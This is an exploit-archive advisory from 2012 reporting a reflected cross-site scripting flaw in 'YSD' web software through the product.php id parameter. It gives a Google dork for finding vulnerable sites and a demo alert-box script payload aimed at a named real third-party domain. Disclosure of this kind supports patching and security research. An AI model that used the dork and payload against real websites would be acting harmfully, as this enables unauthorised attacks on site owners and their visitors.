YSD Cross Site Scripting

2012.11.03
Credit: Net.W0lf
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

======================================================================================== YSD <= Cross Site Scripting Vulnerability ======================================================================================== [+] Title : [ YSD <= Cross Site Scripting Vulnerability ] [+] Auth0r : [ Hack Center Security Team ] [+] Discovered By : [ Net.W0lf ] [+] Software Link : [ www.ysd.hk ] [+] Impact : [ High ] [+] E-Mail : [ Bl4ck.Intell@gmail.com & Net-w0lf@att.net ] [+] Google Dork : [ intext:" Designed by YSD " ] ======================================================================================== +-----------------------+ | Cross Site Scripting | +-----------------------+ -----[ 3xploit ]----- [+] 127.0.0.1/[patch]/product.php?id=[Xss] -----[ D3mo ]----- [+] www.inergicorp.com/product.php?id="><script>alert(/HC/)</script> [+] Greetz : | Am!r | B3HZ4D | PacketStormSecurity.org | Exploit-db.com | All Iranian PentesterZ # [+] You Can See Us In The D4rk # ##########################################################################################

References:

http://www.ysd.hk


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top